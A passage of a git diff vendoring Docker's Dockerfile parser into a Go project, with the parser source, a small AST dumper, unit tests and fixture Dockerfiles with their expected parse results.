+		{`C:\wdi`, `c:\`, `\`, ``},
+		{`C:\wdj`, `.`, `\wdj`, ``},
+		{`C:\wdk`, `foo/bar`, `\wdk\foo\bar`, ``},
+		{`C:\wdl`, `foo\bar`, `\wdl\foo\bar`, ``},
+		{`C:\wdm`, `foo/bar/`, `\wdm\foo\bar\`, ``},
+		{`C:\wdn`, `foo\bar/`, `\wdn\foo\bar\`, ``},
+	}
+	for _, i := range tests {
+		got, err := normaliseDest("TEST", i.current, i.requested)
+		if err != nil && i.etext == "" {
+			t.Fatalf("TestNormaliseDest Got unexpected error %q for %s %s. ", err.Error(), i.current, i.requested)
+		}
+		if i.etext != "" && ((err == nil) || (err != nil && err.Error() != i.etext)) {
+			if err == nil {
+				t.Fatalf("TestNormaliseDest Expected an error for %s %s but didn't get one", i.current, i.requested)
+			} else {
+				t.Fatalf("TestNormaliseDest Wrong error text for %s %s - %s", i.current, i.requested, err.Error())
+			}
+		}
+		if i.etext == "" && got != i.expected {
+			t.Fatalf("TestNormaliseDest Expected %q for %q and %q. Got %q", i.expected, i.current, i.requested, got)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go
new file mode 100644
index 0000000000..fff3046fd3
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go
@@ -0,0 +1,36 @@
+package main
+
+import (
+	"fmt"
+	"os"
+
+	"github.com/docker/docker/builder/dockerfile/parser"
+)
+
+func main() {
+	var f *os.File
+	var err error
+
+	if len(os.Args) < 2 {
+		fmt.Println("please supply filename(s)")
+		os.Exit(1)
+	}
+
+	for _, fn := range os.Args[1:] {
+		f, err = os.Open(fn)
+		if err != nil {
+			panic(err)
+		}
+		defer f.Close()
+
+		d := parser.Directive{LookingForDirectives: true}
+		parser.SetEscapeToken(parser.DefaultEscapeToken, &d)
+
+		ast, err := parser.Parse(f, &d)
+		if err != nil {
+			panic(err)
+		} else {
+			fmt.Println(ast.Dump())
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go
new file mode 100644
index 0000000000..60d74d9c36
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go
@@ -0,0 +1,61 @@
+package parser
+
+import (
+	"testing"
+)
+
+var invalidJSONArraysOfStrings = []string{
+	`["a",42,"b"]`,
+	`["a",123.456,"b"]`,
+	`["a",{},"b"]`,
+	`["a",{"c": "d"},"b"]`,
+	`["a",["c"],"b"]`,
+	`["a",true,"b"]`,
+	`["a",false,"b"]`,
+	`["a",null,"b"]`,
+}
+
+var validJSONArraysOfStrings = map[string][]string{
+	`[]`:           {},
+	`[""]`:         {""},
+	`["a"]`:        {"a"},
+	`["a","b"]`:    {"a", "b"},
+	`[ "a", "b" ]`: {"a", "b"},
+	`[	"a",	"b"	]`: {"a", "b"},
+	`	[	"a",	"b"	]	`: {"a", "b"},
+	`["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"]`: {"abc 123", "♥", "☃", "\" \\ / \b \f \n \r \t \u0000"},
+}
+
+func TestJSONArraysOfStrings(t *testing.T) {
+	for json, expected := range validJSONArraysOfStrings {
+		d := Directive{}
+		SetEscapeToken(DefaultEscapeToken, &d)
+
+		if node, _, err := parseJSON(json, &d); err != nil {
+			t.Fatalf("%q should be a valid JSON array of strings, but wasn't! (err: %q)", json, err)
+		} else {
+			i := 0
+			for node != nil {
+				if i >= len(expected) {
+					t.Fatalf("expected result is shorter than parsed result (%d vs %d+) in %q", len(expected), i+1, json)
+				}
+				if node.Value != expected[i] {
+					t.Fatalf("expected %q (not %q) in %q at pos %d", expected[i], node.Value, json, i)
+				}
+				node = node.Next
+				i++
+			}
+			if i != len(expected) {
+				t.Fatalf("expected result is longer than parsed result (%d vs %d) in %q", len(expected), i+1, json)
+			}
+		}
+	}
+	for _, json := range invalidJSONArraysOfStrings {
+		d := Directive{}
+		SetEscapeToken(DefaultEscapeToken, &d)
+
+		if _, _, err := parseJSON(json, &d); err != errDockerfileNotStringArray {
+			t.Fatalf("%q should be an invalid JSON array of strings, but wasn't!", json)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go
new file mode 100644
index 0000000000..d2bf2b01b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go
@@ -0,0 +1,361 @@
+package parser
+
+// line parsers are dispatch calls that parse a single unit of text into a
+// Node object which contains the whole statement. Dockerfiles have varied
+// (but not usually unique, see ONBUILD for a unique example) parsing rules
+// per-command, and these unify the processing in a way that makes it
+// manageable.
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"strings"
+	"unicode"
+	"unicode/utf8"
+)
+
+var (
+	errDockerfileNotStringArray = errors.New("When using JSON array syntax, arrays must be comprised of strings only.")
+)
+
+// ignore the current argument. This will still leave a command parsed, but
+// will not incorporate the arguments into the ast.
+func parseIgnore(rest string, d *Directive) (*Node, map[string]bool, error) {
+	return &Node{}, nil, nil
+}
+
+// used for onbuild. Could potentially be used for anything that represents a
+// statement with sub-statements.
+//
+// ONBUILD RUN foo bar -> (onbuild (run foo bar))
+//
+func parseSubCommand(rest string, d *Directive) (*Node, map[string]bool, error) {
+	if rest == "" {
+		return nil, nil, nil
+	}
+
+	_, child, err := ParseLine(rest, d, false)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	return &Node{Children: []*Node{child}}, nil, nil
+}
+
+// helper to parse words (i.e space delimited or quoted strings) in a statement.
+// The quotes are preserved as part of this function and they are stripped later
+// as part of processWords().
+func parseWords(rest string, d *Directive) []string {
+	const (
+		inSpaces = iota // looking for start of a word
+		inWord
+		inQuote
+	)
+
+	words := []string{}
+	phase := inSpaces
+	word := ""
+	quote := '\000'
+	blankOK := false
+	var ch rune
+	var chWidth int
+
+	for pos := 0; pos <= len(rest); pos += chWidth {
+		if pos != len(rest) {
+			ch, chWidth = utf8.DecodeRuneInString(rest[pos:])
+		}
+
+		if phase == inSpaces { // Looking for start of word
+			if pos == len(rest) { // end of input
+				break
+			}
+			if unicode.IsSpace(ch) { // skip spaces
+				continue
+			}
+			phase = inWord // found it, fall through
+		}
+		if (phase == inWord || phase == inQuote) && (pos == len(rest)) {
+			if blankOK || len(word) > 0 {
+				words = append(words, word)
+			}
+			break
+		}
+		if phase == inWord {
+			if unicode.IsSpace(ch) {
+				phase = inSpaces
+				if blankOK || len(word) > 0 {
+					words = append(words, word)
+				}
+				word = ""
+				blankOK = false
+				continue
+			}
+			if ch == '\'' || ch == '"' {
+				quote = ch
+				blankOK = true
+				phase = inQuote
+			}
+			if ch == d.EscapeToken {
+				if pos+chWidth == len(rest) {
+					continue // just skip an escape token at end of line
+				}
+				// If we're not quoted and we see an escape token, then always just
+				// add the escape token plus the char to the word, even if the char
+				// is a quote.
+				word += string(ch)
+				pos += chWidth
+				ch, chWidth = utf8.DecodeRuneInString(rest[pos:])
+			}
+			word += string(ch)
+			continue
+		}
+		if phase == inQuote {
+			if ch == quote {
+				phase = inWord
+			}
+			// The escape token is special except for ' quotes - can't escape anything for '
+			if ch == d.EscapeToken && quote != '\'' {
+				if pos+chWidth == len(rest) {
+					phase = inWord
+					continue // just skip the escape token at end
+				}
+				pos += chWidth
+				word += string(ch)
+				ch, chWidth = utf8.DecodeRuneInString(rest[pos:])
+			}
+			word += string(ch)
+		}
+	}
+
+	return words
+}
+
+// parse environment like statements. Note that this does *not* handle
+// variable interpolation, which will be handled in the evaluator.
+func parseNameVal(rest string, key string, d *Directive) (*Node, map[string]bool, error) {
+	// This is kind of tricky because we need to support the old
+	// variant:   KEY name value
+	// as well as the new one:    KEY name=value ...
+	// The trigger to know which one is being used will be whether we hit
+	// a space or = first.  space ==> old, "=" ==> new
+
+	words := parseWords(rest, d)
+	if len(words) == 0 {
+		return nil, nil, nil
+	}
+
+	var rootnode *Node
+
+	// Old format (KEY name value)
+	if !strings.Contains(words[0], "=") {
+		node := &Node{}
+		rootnode = node
+		strs := tokenWhitespace.Split(rest, 2)
+
+		if len(strs) < 2 {
+			return nil, nil, fmt.Errorf(key + " must have two arguments")
+		}
+
+		node.Value = strs[0]
+		node.Next = &Node{}
+		node.Next.Value = strs[1]
+	} else {
+		var prevNode *Node
+		for i, word := range words {
+			if !strings.Contains(word, "=") {
+				return nil, nil, fmt.Errorf("Syntax error - can't find = in %q. Must be of the form: name=value", word)
+			}
+			parts := strings.SplitN(word, "=", 2)
+
+			name := &Node{}
+			value := &Node{}
+
+			name.Next = value
+			name.Value = parts[0]
+			value.Value = parts[1]
+
+			if i == 0 {
+				rootnode = name
+			} else {
+				prevNode.Next = name
+			}
+			prevNode = value
+		}
+	}
+
+	return rootnode, nil, nil
+}
+
+func parseEnv(rest string, d *Directive) (*Node, map[string]bool, error) {
+	return parseNameVal(rest, "ENV", d)
+}
+
+func parseLabel(rest string, d *Directive) (*Node, map[string]bool, error) {
+	return parseNameVal(rest, "LABEL", d)
+}
+
+// parses a statement containing one or more keyword definition(s) and/or
+// value assignments, like `name1 name2= name3="" name4=value`.
+// Note that this is a stricter format than the old format of assignment,
+// allowed by parseNameVal(), in a way that this only allows assignment of the
+// form `keyword=[<value>]` like  `name2=`, `name3=""`, and `name4=value` above.
+// In addition, a keyword definition alone is of the form `keyword` like `name1`
+// above. And the assignments `name2=` and `name3=""` are equivalent and
+// assign an empty value to the respective keywords.
+func parseNameOrNameVal(rest string, d *Directive) (*Node, map[string]bool, error) {
+	words := parseWords(rest, d)
+	if len(words) == 0 {
+		return nil, nil, nil
+	}
+
+	var (
+		rootnode *Node
+		prevNode *Node
+	)
+	for i, word := range words {
+		node := &Node{}
+		node.Value = word
+		if i == 0 {
+			rootnode = node
+		} else {
+			prevNode.Next = node
+		}
+		prevNode = node
+	}
+
+	return rootnode, nil, nil
+}
+
+// parses a whitespace-delimited set of arguments. The result is effectively a
+// linked list of string arguments.
+func parseStringsWhitespaceDelimited(rest string, d *Directive) (*Node, map[string]bool, error) {
+	if rest == "" {
+		return nil, nil, nil
+	}
+
+	node := &Node{}
+	rootnode := node
+	prevnode := node
+	for _, str := range tokenWhitespace.Split(rest, -1) { // use regexp
+		prevnode = node
+		node.Value = str
+		node.Next = &Node{}
+		node = node.Next
+	}
+
+	// XXX to get around regexp.Split *always* providing an empty string at the
+	// end due to how our loop is constructed, nil out the last node in the
+	// chain.
+	prevnode.Next = nil
+
+	return rootnode, nil, nil
+}
+
+// parsestring just wraps the string in quotes and returns a working node.
+func parseString(rest string, d *Directive) (*Node, map[string]bool, error) {
+	if rest == "" {
+		return nil, nil, nil
+	}
+	n := &Node{}
+	n.Value = rest
+	return n, nil, nil
+}
+
+// parseJSON converts JSON arrays to an AST.
+func parseJSON(rest string, d *Directive) (*Node, map[string]bool, error) {
+	rest = strings.TrimLeftFunc(rest, unicode.IsSpace)
+	if !strings.HasPrefix(rest, "[") {
+		return nil, nil, fmt.Errorf(`Error parsing "%s" as a JSON array`, rest)
+	}
+
+	var myJSON []interface{}
+	if err := json.NewDecoder(strings.NewReader(rest)).Decode(&myJSON); err != nil {
+		return nil, nil, err
+	}
+
+	var top, prev *Node
+	for _, str := range myJSON {
+		s, ok := str.(string)
+		if !ok {
+			return nil, nil, errDockerfileNotStringArray
+		}
+
+		node := &Node{Value: s}
+		if prev == nil {
+			top = node
+		} else {
+			prev.Next = node
+		}
+		prev = node
+	}
+
+	return top, map[string]bool{"json": true}, nil
+}
+
+// parseMaybeJSON determines if the argument appears to be a JSON array. If
+// so, passes to parseJSON; if not, quotes the result and returns a single
+// node.
+func parseMaybeJSON(rest string, d *Directive) (*Node, map[string]bool, error) {
+	if rest == "" {
+		return nil, nil, nil
+	}
+
+	node, attrs, err := parseJSON(rest, d)
+
+	if err == nil {
+		return node, attrs, nil
+	}
+	if err == errDockerfileNotStringArray {
+		return nil, nil, err
+	}
+
+	node = &Node{}
+	node.Value = rest
+	return node, nil, nil
+}
+
+// parseMaybeJSONToList determines if the argument appears to be a JSON array. If
+// so, passes to parseJSON; if not, attempts to parse it as a whitespace
+// delimited string.
+func parseMaybeJSONToList(rest string, d *Directive) (*Node, map[string]bool, error) {
+	node, attrs, err := parseJSON(rest, d)
+
+	if err == nil {
+		return node, attrs, nil
+	}
+	if err == errDockerfileNotStringArray {
+		return nil, nil, err
+	}
+
+	return parseStringsWhitespaceDelimited(rest, d)
+}
+
+// The HEALTHCHECK command is like parseMaybeJSON, but has an extra type argument.
+func parseHealthConfig(rest string, d *Directive) (*Node, map[string]bool, error) {
+	// Find end of first argument
+	var sep int
+	for ; sep < len(rest); sep++ {
+		if unicode.IsSpace(rune(rest[sep])) {
+			break
+		}
+	}
+	next := sep
+	for ; next < len(rest); next++ {
+		if !unicode.IsSpace(rune(rest[next])) {
+			break
+		}
+	}
+
+	if sep == 0 {
+		return nil, nil, nil
+	}
+
+	typ := rest[:sep]
+	cmd, attrs, err := parseMaybeJSON(rest[next:], d)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	return &Node{Value: typ, Next: cmd}, attrs, err
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go
new file mode 100644
index 0000000000..e534644491
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go
@@ -0,0 +1,221 @@
+// Package parser implements a parser and parse tree dumper for Dockerfiles.
+package parser
+
+import (
+	"bufio"
+	"bytes"
+	"fmt"
+	"io"
+	"regexp"
+	"strings"
+	"unicode"
+
+	"github.com/docker/docker/builder/dockerfile/command"
+)
+
+// Node is a structure used to represent a parse tree.
+//
+// In the node there are three fields, Value, Next, and Children. Value is the
+// current token's string value. Next is always the next non-child token, and
+// children contains all the children. Here's an example:
+//
+// (value next (child child-next child-next-next) next-next)
+//
+// This data structure is frankly pretty lousy for handling complex languages,
+// but lucky for us the Dockerfile isn't very complicated. This structure
+// works a little more effectively than a "proper" parse tree for our needs.
+//
+type Node struct {
+	Value      string          // actual content
+	Next       *Node           // the next item in the current sexp
+	Children   []*Node         // the children of this sexp
+	Attributes map[string]bool // special attributes for this node
+	Original   string          // original line used before parsing
+	Flags      []string        // only top Node should have this set
+	StartLine  int             // the line in the original dockerfile where the node begins
+	EndLine    int             // the line in the original dockerfile where the node ends
+}
+
+// Directive is the structure used during a build run to hold the state of
+// parsing directives.
+type Directive struct {
+	EscapeToken           rune           // Current escape token
+	LineContinuationRegex *regexp.Regexp // Current line contination regex
+	LookingForDirectives  bool           // Whether we are currently looking for directives
+	EscapeSeen            bool           // Whether the escape directive has been seen
+}
+
+var (
+	dispatch           map[string]func(string, *Directive) (*Node, map[string]bool, error)
+	tokenWhitespace    = regexp.MustCompile(`[\t\v\f\r ]+`)
+	tokenEscapeCommand = regexp.MustCompile(`^#[ \t]*escape[ \t]*=[ \t]*(?P<escapechar>.).*$`)
+	tokenComment       = regexp.MustCompile(`^#.*$`)
+)
+
+// DefaultEscapeToken is the default escape token
+const DefaultEscapeToken = "\\"
+
+// SetEscapeToken sets the default token for escaping characters in a Dockerfile.
+func SetEscapeToken(s string, d *Directive) error {
+	if s != "`" && s != "\\" {
+		return fmt.Errorf("invalid ESCAPE '%s'. Must be ` or \\", s)
+	}
+	d.EscapeToken = rune(s[0])
+	d.LineContinuationRegex = regexp.MustCompile(`\` + s + `[ \t]*$`)
+	return nil
+}
+
+func init() {
+	// Dispatch Table. see line_parsers.go for the parse functions.
+	// The command is parsed and mapped to the line parser. The line parser
+	// receives the arguments but not the command, and returns an AST after
+	// reformulating the arguments according to the rules in the parser
+	// functions. Errors are propagated up by Parse() and the resulting AST can
+	// be incorporated directly into the existing AST as a next.
+	dispatch = map[string]func(string, *Directive) (*Node, map[string]bool, error){
+		command.Add:         parseMaybeJSONToList,
+		command.Arg:         parseNameOrNameVal,
+		command.Cmd:         parseMaybeJSON,
+		command.Copy:        parseMaybeJSONToList,
+		command.Entrypoint:  parseMaybeJSON,
+		command.Env:         parseEnv,
+		command.Expose:      parseStringsWhitespaceDelimited,
+		command.From:        parseString,
+		command.Healthcheck: parseHealthConfig,
+		command.Label:       parseLabel,
+		command.Maintainer:  parseString,
+		command.Onbuild:     parseSubCommand,
+		command.Run:         parseMaybeJSON,
+		command.Shell:       parseMaybeJSON,
+		command.StopSignal:  parseString,
+		command.User:        parseString,
+		command.Volume:      parseMaybeJSONToList,
+		command.Workdir:     parseString,
+	}
+}
+
+// ParseLine parses a line and returns the remainder.
+func ParseLine(line string, d *Directive, ignoreCont bool) (string, *Node, error) {
+	// Handle the parser directive '# escape=<char>. Parser directives must precede
+	// any builder instruction or other comments, and cannot be repeated.
+	if d.LookingForDirectives {
+		tecMatch := tokenEscapeCommand.FindStringSubmatch(strings.ToLower(line))
+		if len(tecMatch) > 0 {
+			if d.EscapeSeen == true {
+				return "", nil, fmt.Errorf("only one escape parser directive can be used")
+			}
+			for i, n := range tokenEscapeCommand.SubexpNames() {
+				if n == "escapechar" {
+					if err := SetEscapeToken(tecMatch[i], d); err != nil {
+						return "", nil, err
+					}
+					d.EscapeSeen = true
+					return "", nil, nil
+				}
+			}
+		}
+	}
+
+	d.LookingForDirectives = false
+
+	if line = stripComments(line); line == "" {
+		return "", nil, nil
+	}
+
+	if !ignoreCont && d.LineContinuationRegex.MatchString(line) {
+		line = d.LineContinuationRegex.ReplaceAllString(line, "")
+		return line, nil, nil
+	}
+
+	cmd, flags, args, err := splitCommand(line)
+	if err != nil {
+		return "", nil, err
+	}
+
+	node := &Node{}
+	node.Value = cmd
+
+	sexp, attrs, err := fullDispatch(cmd, args, d)
+	if err != nil {
+		return "", nil, err
+	}
+
+	node.Next = sexp
+	node.Attributes = attrs
+	node.Original = line
+	node.Flags = flags
+
+	return "", node, nil
+}
+
+// Parse is the main parse routine.
+// It handles an io.ReadWriteCloser and returns the root of the AST.
+func Parse(rwc io.Reader, d *Directive) (*Node, error) {
+	currentLine := 0
+	root := &Node{}
+	root.StartLine = -1
+	scanner := bufio.NewScanner(rwc)
+
+	utf8bom := []byte{0xEF, 0xBB, 0xBF}
+	for scanner.Scan() {
+		scannedBytes := scanner.Bytes()
+		// We trim UTF8 BOM
+		if currentLine == 0 {
+			scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom)
+		}
+		scannedLine := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace)
+		currentLine++
+		line, child, err := ParseLine(scannedLine, d, false)
+		if err != nil {
+			return nil, err
+		}
+		startLine := currentLine
+
+		if line != "" && child == nil {
+			for scanner.Scan() {
+				newline := scanner.Text()
+				currentLine++
+
+				if stripComments(strings.TrimSpace(newline)) == "" {
+					continue
+				}
+
+				line, child, err = ParseLine(line+newline, d, false)
+				if err != nil {
+					return nil, err
+				}
+
+				if child != nil {
+					break
+				}
+			}
+			if child == nil && line != "" {
+				// When we call ParseLine we'll pass in 'true' for
+				// the ignoreCont param if we're at the EOF. This will
+				// prevent the func from returning immediately w/o
+				// parsing the line thinking that there's more input
+				// to come.
+
+				_, child, err = ParseLine(line, d, scanner.Err() == nil)
+				if err != nil {
+					return nil, err
+				}
+			}
+		}
+
+		if child != nil {
+			// Update the line information for the current child.
+			child.StartLine = startLine
+			child.EndLine = currentLine
+			// Update the line information for the root. The starting line of the root is always the
+			// starting line of the first child and the ending line is the ending line of the last child.
+			if root.StartLine < 0 {
+				root.StartLine = currentLine
+			}
+			root.EndLine = currentLine
+			root.Children = append(root.Children, child)
+		}
+	}
+
+	return root, nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go
new file mode 100644
index 0000000000..e8e26961de
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go
@@ -0,0 +1,173 @@
+package parser
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"testing"
+)
+
+const testDir = "testfiles"
+const negativeTestDir = "testfiles-negative"
+const testFileLineInfo = "testfile-line/Dockerfile"
+
+func getDirs(t *testing.T, dir string) []string {
+	f, err := os.Open(dir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	defer f.Close()
+
+	dirs, err := f.Readdirnames(0)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	return dirs
+}
+
+func TestTestNegative(t *testing.T) {
+	for _, dir := range getDirs(t, negativeTestDir) {
+		dockerfile := filepath.Join(negativeTestDir, dir, "Dockerfile")
+
+		df, err := os.Open(dockerfile)
+		if err != nil {
+			t.Fatalf("Dockerfile missing for %s: %v", dir, err)
+		}
+		defer df.Close()
+
+		d := Directive{LookingForDirectives: true}
+		SetEscapeToken(DefaultEscapeToken, &d)
+		_, err = Parse(df, &d)
+		if err == nil {
+			t.Fatalf("No error parsing broken dockerfile for %s", dir)
+		}
+	}
+}
+
+func TestTestData(t *testing.T) {
+	for _, dir := range getDirs(t, testDir) {
+		dockerfile := filepath.Join(testDir, dir, "Dockerfile")
+		resultfile := filepath.Join(testDir, dir, "result")
+
+		df, err := os.Open(dockerfile)
+		if err != nil {
+			t.Fatalf("Dockerfile missing for %s: %v", dir, err)
+		}
+		defer df.Close()
+
+		d := Directive{LookingForDirectives: true}
+		SetEscapeToken(DefaultEscapeToken, &d)
+		ast, err := Parse(df, &d)
+		if err != nil {
+			t.Fatalf("Error parsing %s's dockerfile: %v", dir, err)
+		}
+
+		content, err := ioutil.ReadFile(resultfile)
+		if err != nil {
+			t.Fatalf("Error reading %s's result file: %v", dir, err)
+		}
+
+		if runtime.GOOS == "windows" {
+			// CRLF --> CR to match Unix behavior
+			content = bytes.Replace(content, []byte{'\x0d', '\x0a'}, []byte{'\x0a'}, -1)
+		}
+
+		if ast.Dump()+"\n" != string(content) {
+			fmt.Fprintln(os.Stderr, "Result:\n"+ast.Dump())
+			fmt.Fprintln(os.Stderr, "Expected:\n"+string(content))
+			t.Fatalf("%s: AST dump of dockerfile does not match result", dir)
+		}
+	}
+}
+
+func TestParseWords(t *testing.T) {
+	tests := []map[string][]string{
+		{
+			"input":  {"foo"},
+			"expect": {"foo"},
+		},
+		{
+			"input":  {"foo bar"},
+			"expect": {"foo", "bar"},
+		},
+		{
+			"input":  {"foo\\ bar"},
+			"expect": {"foo\\ bar"},
+		},
+		{
+			"input":  {"foo=bar"},
+			"expect": {"foo=bar"},
+		},
+		{
+			"input":  {"foo bar 'abc xyz'"},
+			"expect": {"foo", "bar", "'abc xyz'"},
+		},
+		{
+			"input":  {`foo bar "abc xyz"`},
+			"expect": {"foo", "bar", `"abc xyz"`},
+		},
+		{
+			"input":  {"àöû"},
+			"expect": {"àöû"},
+		},
+		{
+			"input":  {`föo bàr "âbc xÿz"`},
+			"expect": {"föo", "bàr", `"âbc xÿz"`},
+		},
+	}
+
+	for _, test := range tests {
+		d := Directive{LookingForDirectives: true}
+		SetEscapeToken(DefaultEscapeToken, &d)
+		words := parseWords(test["input"][0], &d)
+		if len(words) != len(test["expect"]) {
+			t.Fatalf("length check failed. input: %v, expect: %q, output: %q", test["input"][0], test["expect"], words)
+		}
+		for i, word := range words {
+			if word != test["expect"][i] {
+				t.Fatalf("word check failed for word: %q. input: %q, expect: %q, output: %q", word, test["input"][0], test["expect"], words)
+			}
+		}
+	}
+}
+
+func TestLineInformation(t *testing.T) {
+	df, err := os.Open(testFileLineInfo)
+	if err != nil {
+		t.Fatalf("Dockerfile missing for %s: %v", testFileLineInfo, err)
+	}
+	defer df.Close()
+
+	d := Directive{LookingForDirectives: true}
+	SetEscapeToken(DefaultEscapeToken, &d)
+	ast, err := Parse(df, &d)
+	if err != nil {
+		t.Fatalf("Error parsing dockerfile %s: %v", testFileLineInfo, err)
+	}
+
+	if ast.StartLine != 5 || ast.EndLine != 31 {
+		fmt.Fprintf(os.Stderr, "Wrong root line information: expected(%d-%d), actual(%d-%d)\n", 5, 31, ast.StartLine, ast.EndLine)
+		t.Fatalf("Root line information doesn't match result.")
+	}
+	if len(ast.Children) != 3 {
+		fmt.Fprintf(os.Stderr, "Wrong number of child: expected(%d), actual(%d)\n", 3, len(ast.Children))
+		t.Fatalf("Root line information doesn't match result for %s", testFileLineInfo)
+	}
+	expected := [][]int{
+		{5, 5},
+		{11, 12},
+		{17, 31},
+	}
+	for i, child := range ast.Children {
+		if child.StartLine != expected[i][0] || child.EndLine != expected[i][1] {
+			t.Logf("Wrong line information for child %d: expected(%d-%d), actual(%d-%d)\n",
+				i, expected[i][0], expected[i][1], child.StartLine, child.EndLine)
+			t.Fatalf("Root line information doesn't match result.")
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile
new file mode 100644
index 0000000000..c7601c9f69
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile
@@ -0,0 +1,35 @@
+# ESCAPE=\
+
+
+
+FROM brimstone/ubuntu:14.04
+
+
+# TORUN -v /var/run/docker.sock:/var/run/docker.sock
+
+
+ENV GOPATH \
+/go
+
+
+
+# Install the packages we need, clean up after them and us
+RUN apt-get update \
+	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \
+
+
+    && apt-get install -y --no-install-recommends git golang ca-certificates \
+    && apt-get clean \
+    && rm -rf /var/lib/apt/lists \
+
+	&& go get -v github.com/brimstone/consuldock \
+    && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \
+
+	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \
+	&& apt-get remove --purge -y $(diff /tmp/dpkg.clean /tmp/dpkg.dirty | awk '/^>/ {print $2}') \
+	&& rm /tmp/dpkg.* \
+	&& rm -rf $GOPATH
+
+
+
+
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile
new file mode 100644
index 0000000000..1d65578794
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile
@@ -0,0 +1,3 @@
+FROM busybox
+
+ENV PATH
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile
new file mode 100644
index 0000000000..d1be4596c7
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile
@@ -0,0 +1 @@
+CMD [ "echo", [ "nested json" ] ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile
new file mode 100644
index 0000000000..00b444cba5
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile
@@ -0,0 +1,11 @@
+FROM	ubuntu:14.04
+MAINTAINER	Seongyeol Lim <seongyeol37@gmail.com>
+
+COPY	.	/go/src/github.com/docker/docker
+ADD		.	/
+ADD		null /
+COPY	nullfile /tmp
+ADD		[ "vimrc", "/tmp" ]
+COPY	[ "bashrc", "/tmp" ]
+COPY	[ "test file", "/tmp" ]
+ADD		[ "test file", "/tmp/test file" ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result
new file mode 100644
index 0000000000..85aee64018
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result
@@ -0,0 +1,10 @@
+(from "ubuntu:14.04")
+(maintainer "Seongyeol Lim <seongyeol37@gmail.com>")
+(copy "." "/go/src/github.com/docker/docker")
+(add "." "/")
+(add "null" "/")
+(copy "nullfile" "/tmp")
+(add "vimrc" "/tmp")
+(copy "bashrc" "/tmp")
+(copy "test file" "/tmp")
+(add "test file" "/tmp/test file")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile
new file mode 100644
index 0000000000..0364ef9d96
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile
@@ -0,0 +1,26 @@
+#escape=\
+FROM brimstone/ubuntu:14.04
+
+MAINTAINER brimstone@the.narro.ws
+
+# TORUN -v /var/run/docker.sock:/var/run/docker.sock
+
+ENV GOPATH /go
+
+# Set our command
+ENTRYPOINT ["/usr/local/bin/consuldock"]
+
+# Install the packages we need, clean up after them and us
+RUN apt-get update \
+	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.clean \
+    && apt-get install -y --no-install-recommends git golang ca-certificates \
+    && apt-get clean \
+    && rm -rf /var/lib/apt/lists \
+
+	&& go get -v github.com/brimstone/consuldock \
+    && mv $GOPATH/bin/consuldock /usr/local/bin/consuldock \
+
+	&& dpkg -l | awk '/^ii/ {print $2}' > /tmp/dpkg.dirty \
